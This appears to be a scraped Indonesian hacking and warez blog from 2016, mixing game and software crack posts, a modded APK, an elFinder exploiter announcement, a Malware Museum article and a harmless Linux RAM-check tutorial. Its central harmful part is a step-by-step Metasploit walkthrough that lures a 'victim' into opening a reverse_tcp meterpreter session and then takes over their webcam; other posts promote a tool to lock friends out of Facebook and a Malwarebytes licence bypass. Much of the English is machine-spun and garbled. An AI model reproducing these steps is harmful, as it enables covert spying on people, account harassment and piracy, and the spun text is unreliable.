Senin, 15 Februari 2016

Grand Theft Auto 5 {G.T.A V }

Grand Theft Auto 5 {G.T.A V }

PC Version

Grand Theft Auto Five (PC Version)

In the midst of the turmoil, three different culprits plot their own odds of survival and achievement: Franklin, a road trickster searching for genuine open doors and genuine cash; Michael, an expert ex-con whose retirement is significantly less ruddy than he trusted it would be; and Trevor, a fierce crazy person driven by the possibility of a shoddy high and the following enormous score.

Grand Theft Auto V is currently accessible on PC 

Grand Theft Auto V for PC highlights a scope of major visual and specialized moves up to make Los Santos and Blaine County more immersive than any time in recent memory. Notwithstanding inconceivably expanded draw separations, Grand Theft Auto V for PC keeps running at 60FPS in 1080p, with the capacity to show visuals in 4K determination. Players will encounter a scope of increases and enhancements including: 

· New weapons, vehicles and exercises 

· Additional untamed life 

· Denser movement 

· New foliage framework 

· Enhanced harm and climate impacts, and a great deal more 


Every one of these components are upgraded by dazzling determination, emotional enhancements to lighting, shadows, and surfaces, and a smooth edge 

How to Crack
  • Copy the Crack into the Root of GTA V Installation Path.
  • Use the launcher.exe given by 3DM to launch , NOT ANY OTHER .EXE FILE.


This cracked version is guaranteed to work and tested on Windows 7 / 8 / 8.x

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Sabtu, 13 Februari 2016

Candy Crush Soda Saga Modded APK has landed {LATEST}

Candy Crush Soda Saga Modded APK has landed {LATEST}

Candy Crush Soda Saga (CCSS)

Candy Crush Soda Saga is the name of the new arrangement of the famous amusement organization,, the maker of the game and acquainted the world to construct another adaptation of the amusement Candy Crush Soda Saga named ie the variant of sodium. The PRO variant of the new characters and graphical design are very high.

  1. Staggering HD representation and are extremely delicious! 
  2. Booster added to assist in the more elevated levels
  3. Characters and new interface in this Soda version
  4. Challenging and extremely difficult procedure 
  5. 165 exceptionally energizing stage in this game 
  6. This version highlights a multiplayer and Sharing Experience
  7. It gets addictive :)

Ulternative Links 

There might be problems when login into Facebook in this Moded Candy Crush Soda Saga

Here is what you do :
    1. Download Candy Crush Soda Saga APK to your sd card. 
    2. Uninstall or simply solidify Facebook. 
    3. Uninstall old version of this game. 
    4. Install the downloaded file, and connect through Facebook. 
    If by any chance you have problems login into Facebook, go to app info ,force stop the game solidify/uninstall Facebook then that should solve the issue.

    Issues or problems feel free to comment below :) Thanks

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                    Auto exploiter elFinder

                    kali ini ane pengen share auto exploiter elFinder.
                    sebenernya ini exploit lama.
                    jadi maklum klo susah dapetin target.

                    versi manual ada disini.

                    karena byk site yg ngehapus elfinder.html, elfinder.php.html, elfinder-src.php.html.

                    maka ane langsung ke akar tempat uploadnya (au namanya apaan, dalam hal ini connector.php khususnya elFinder.class.php)


           [ CLI Version ]
           [ Web Version ( Single Xploiter ) ]
           [ Web Version ( Mass Xploiter ) ]


                    live target:

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                    Kamis, 11 Februari 2016

                    How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

                    How to hack WebCam using Metasploit(Kali Linux/ Backtrack)

                    {How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). So today we are going to learn about How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). I will teach you how you guys can easily Hack WebCam using Metasploit(Kali Linux/ Backtrack). All you need is linux based OS and Metasploit.


                    How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

                    How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). Our main reason for this tutorial is to indicate exactly how simple it is, so you will take better mindfulness that it is possible, and take security and protect yourself. So lets get started: How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

                    Open Metasploit And write the following commands step by step :)
                    • msf> show exploits
                    • msf> use windows/browser/adobe_cooltype_sing
                    • msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
                    • payload=> windows/meterpreter/reverse_tcp
                    • msf exploit(adobe_cooltype_sing) > show options

                      Windows Platform Testing

                    • msf exploit(adobe_cooltype_sing) > set SRVHOST
                    • SRVHOST =>
                    • msf exploit(adobe_cooltype_sing) > set SRVPORT 80
                    • SRVPORT => 80
                    • msf exploit(adobe_cooltype_sing) > set uripath /
                    • uripath => /
                    • msf exploit(adobe_cooltype_sing) > set uripath /
                    • uripath => /
                    • msf exploit(adobe_cooltype_sing) >exploit -j
                    • Let the victim open your IP in their (his/her)  browser and when it will be opened, you will get 1 meterpreter session.
                    • msf exploit(adobe_cooltype_sing) > session -i 1
                    • meterpreter> run webcam  
                    • And you will get access to the webcam of the targeted victim .
                    • Congratulations you did it :D !!

                    How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

                    I hope you got everything. My next tutorial will be about Using Metasploit to Hack an Android Phone. STAY CONNECTED ;)

                    If you have any queries fell free to comment below.

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                    Selasa, 09 Februari 2016

                    The Malware Museum

                    Malware Museum lets you 

                    Safely experience the PC viruses 

                    Of days passed 


                    February 2016
                    Virus Attack Exposed

                    We're all acquainted with malware as a treacherous hazard that looks to take your own data and payment information, yet it was not generally so. In the beginning of individualized computing, infections were to a lesser degree a vindictive danger and a greater amount of an irritating joke. Presently you can remember the "heavenliness" days of generally innocuous PC infections by going by the Malware Museum facilitated at the Internet Archive.

                    The gathering comprises of a couple of dozen samples of ahead of schedule malware curated by PC security master and scientist Mikko Hyppönen. Every one of the cases of antique malware in the exhibition hall are from the 80s and 90s, and will run totally in your program utilizing a DOSBox emulator. That keeps you decent and safe, however the first records have likewise been scrubbed of perilous code. You can download the adjusted documents in the event that you need to play around with them all alone framework. 

                    Only a couple of minutes in the Malware Museum will commute home how distinctive things used to be. A number of the infections facilitated are barely malware — they're pretty much unbiased. Cutting edge malware is generally composed on account of a money related motivating force, so constraining recognition is a critical part of the payload. In the event that the client doesn't know the infection arrives, they won't know so no getting free of it. These great infections were about ensuring the client knew they had been hacked. It was about the distinction of making something smart and intriguing.

                    A percentage of the illustrations in the Malware Museum do minimal more than show a fun realistic on the influenced PC. For example, the Q Walker infection causes a character from the Commodore 64 diversion Bop 'n Rumble to walk around your screen (see underneath). He just continues doing it, however, which I expect would be irritating. At that point there's the Mars G infection, which notes as it loads that "coding an infection can be inventive." This one creates a moving Martian scene utilizing voxel rendering. It doesn't prevent you from utilizing the PC as you can hit any key to exit.

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                    Hack Facebook Account [FREEZE]

                    FACEBOOK ACCOUNT [HACK]

                    FREEZE AND SHUTDOWN

                     VERSION 2 MODDED

                    Recently when i was surfing on the net i went over an intriguing script kiddy tool named Facebook Freezer. Actually this instrument is not utilized for hacking Facebook but rather it is basically used to keep clients from signing into Facebook sounds fun ... HA HA HA yup it is !! . Use the directions offered underneath to keep your companions , from signing into their Facebook account.

                                                                                                       LINK UPDATED
                    How to use

                    1. Launch tool 
                    2. Enter victim email address  in the Target field
                    3. Afterwards FREEEEEZEEEE !! botton 
                    5. Wait and see the magic !!
                    !! USE THIS TOOL WISELY !!
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                    Malwarebytes Anti-Malware Premium and LIFETIME Version

                    Malwarebytes Anti-Malware Premium and LIFETIME Version have ARRIVED !

                    MALWARE REALLY BITES

                    Malwarebytes Anti-Malware is hostile to malware. It can altogether uproot even the most developed malware. Malwarebytes items have a demonstrated record of ensuring PCs by totally uprooting all types of malware, including infections, Trojans, spyware, adware and root-kits. With regards to the security of your PC, Malwarebytes gives a definitive in insurance from the forefront of innovation! Malwarebytes innovation steps in the battle against malware. Malwarebytes Anti-Malware PRO recognizes and uproots malware where even the best known antivirus and malware applications fizzle. Malwarebytes Anti-Malware PRO screens each procedure and stops pernicious procedures before they even begin.

                    Just to see how it protects

                    Want it for Lifetime use no problem...

                    Step by step instructions to Activate ? 

                    1. Run the Installer of Malwarebytes Anti-Malware 
                    2. Dispatch it and Click on Activate 
                    3. Click on I likewise have an ID
                    4. Enter any ID and Key  
                    5. Click Activate , then check I acquired my Key and tap on Next 
                    6. That is all you're done !!

                    Read more

                    Senin, 08 Februari 2016

                    How to Check The Number of Slots and Capacity Upgrade RAM Laptop / Computer in Linux

                    Cara Cek Jumlah Slot dan Kapasitas Upgrade RAM Laptop/Komputer di Linux
                    logo terminal linux

                    Iseng, karena rencana kepingin upgrade RAM Laptop maka saya juga harus mengetahui seberapa besar kapasitas maksimum RAM yang bisa dipasang dan berapa Jumlah Slot RAM yang ada pada Laptop saya maka saya coba searching sebentar... akhirnya ketemu juga...

                    Tidak perlu instal tools, kita tinggal ketik aja pada Terminal Linux kita. Oh iya, disini saya menggunakan Linux Mint 17.3 Cinnamon. Kalau untuk Distro dari Debian biasanya perintahnya sama. So, jika anda menggunakan Ubuntu, Linux Mint, dsb perintahnya sama...
                    luxsmart-Lenovo-G40-45 lux-smart # dmidecode --type memory
                    # dmidecode 2.12
                    SMBIOS 2.8 present.

                    Handle 0x0005, DMI type 5, 20 bytes
                    Memory Controller Information
                        Error Detecting Method: None
                        Error Correcting Capabilities:
                        Supported Interleave: One-way Interleave
                        Current Interleave: One-way Interleave
                        Maximum Memory Module Size: 8192 MB #Maksimum per-slot
                        Maximum Total Memory Size: 16384 MB #Maksimum kapasitas
                        Supported Speeds:
                            70 ns
                            60 ns
                            50 ns
                        Supported Memory Types:
                            Burst EDO
                        Memory Module Voltage: 3.3 V
                        Associated Memory Slots: 2
                        Enabled Error Correcting Capabilities:
                            Single-bit Error Correcting
                            Double-bit Error Correcting
                            Error Scrubbing

                    Handle 0x0006, DMI type 6, 12 bytes #Slot kosong
                    Memory Module Information
                        Socket Designation: DIMM 0
                        Bank Connections: None
                        Current Speed: Unknown
                        Type: None
                        Installed Size: Not Installed
                        Enabled Size: Not Installed
                        Error Status: OK

                    Handle 0x0007, DMI type 6, 12 bytes #Slot yang terisi
                    Memory Module Information
                        Socket Designation: DIMM 1
                        Bank Connections: None
                        Current Speed: 1 ns
                        Type: DIMM
                        Installed Size: 4096 MB (Single-bank Connection)
                        Enabled Size: 4096 MB (Single-bank Connection)
                        Error Status: OK

                    Handle 0x0020, DMI type 16, 23 bytes
                    Physical Memory Array
                        Location: System Board Or Motherboard
                        Use: System Memory
                        Error Correction Type: None
                        Maximum Capacity: 16 GB
                        Error Information Handle: 0x0024
                        Number Of Devices: 2

                    Handle 0x0021, DMI type 17, 40 bytes
                    Memory Device
                        Array Handle: 0x0020
                        Error Information Handle: Not Provided
                        Total Width: Unknown
                        Data Width: Unknown
                        Size: No Module Installed
                        Form Factor: <OUT OF SPEC>
                        Set: None
                        Locator: DIMM 0
                        Bank Locator: CHANNEL A
                        Type: Unknown
                        Type Detail: Unknown
                        Speed: Unknown
                        Manufacturer: Empty
                        Serial Number: Empty
                        Asset Tag: Asset Tag:
                        Part Number: Empty
                        Rank: Unknown
                        Configured Clock Speed: Unknown
                        Minimum voltage:  Unknown
                        Maximum voltage:  Unknown
                        Configured voltage:  Unknown

                    Handle 0x0022, DMI type 17, 40 bytes
                    Memory Device
                        Array Handle: 0x0020
                        Error Information Handle: 0x0023
                        Total Width: 64 bits
                        Data Width: 64 bits
                        Size: 4096 MB
                        Form Factor: SODIMM
                        Set: None
                        Locator: DIMM 1
                        Bank Locator: CHANNEL A
                        Type: DDR3
                        Type Detail: Synchronous Unbuffered (Unregistered)
                        Speed: 800 MHz
                        Manufacturer: Not Specified
                        Serial Number: 43F97EC8
                        Asset Tag: Asset Tag:
                        Part Number: RMT3170MN68F9F1600
                        Rank: 1
                        Configured Clock Speed: 800 MHz
                        Minimum voltage:  Unknown
                        Maximum voltage:  Unknown
                        Configured voltage:  Unknown
                    Oke, itulah triknya. Semoga bermanfaat...

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